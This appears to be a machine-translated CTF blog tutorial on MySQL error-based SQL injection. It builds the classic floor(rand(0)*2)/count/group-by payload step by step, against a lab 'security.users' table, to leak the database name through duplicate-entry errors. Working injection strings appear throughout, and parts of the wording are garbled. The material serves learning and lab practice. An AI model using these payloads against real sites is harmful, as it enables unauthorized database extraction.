Tag Archives: ctf

Floor() error injection

Floor () error injection is exactly floor,count,group by conflict error
Is an error that occurs when these three functions are used together in a particular situation.
First look at the classic FLOOR injection statement:
and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)
At first glance, it may seem overwhelming, but let’s start with the basics and analyze the statement at the end
The first is the condition under which the floor() error is generated:
Select count(*),floor(rand(0)*2)x from secure.users group by x select count(*),floor(rand(0)*2)x from secure.users group by x
Floor (RAND (0)*2)x = floor(RAND (0)*2)x = floor(RAND (0)*2)x = floor(RAND (0)*2
Let group by meet floor(rand(0)*2) (if you’ll excuse me),
The specific principle will not be analyzed here, and a few principle explanation links will be attached at the end.
First look at the direct execution effect:

The Duplocate Entry error here is exactly what we want. The error location is on the floor(RAND (0)*2), and the 1 is determined by the error principle. After all, we haven’t written any of the subqueries we want.
Next we add the desired subquery to the error location, concatenating it with concat() :
select count(*) ,concat(database(),floor(rand(0)*2))x from security.users group by x

Security is the database name we want, 1 is the concatenation from the previous step.
But is it possible to use it directly now?Let’s see what happens when we concatenate it directly into and:
select * from security.users where id=1 and (select count(*) ,concat(database(),floor(rand(0)*2)x) from security.users group by x)

To a fault, baidu found a cause for this error a lot, I am here think we build the result of a select statement is a result table, while the and need a Boolean value, that is, the value of the zero or non-zero, that we are in a nested query, said the result is a result of the select in front of the table, that we can again from this table to execute queries, but this time the select this value is zero number:
select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from security.users group by x)a
Again, this last “a” does exactly the same thing as the “x” we explained earlier, which is an alias for the parentheses,
SQL statements require that an alias name be given when a query is executed based on the result of the query.
Execute after nested into AND
select * from security.users where id=1 and(select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from security.users group by x)a)

You’re done
We have completed the floo() injection statement we introduced at the beginning
 
Several fool() principles explained:
https://www.cnblogs.com/xdans/p/5412468.html
https://www.cnblogs.com/litlife/p/8472323.html
http://www.cnblogs.com/xishaonian/p/6227405.html
Referral to indicate source
Sync to my blog: http://119.23.249.120/archives/276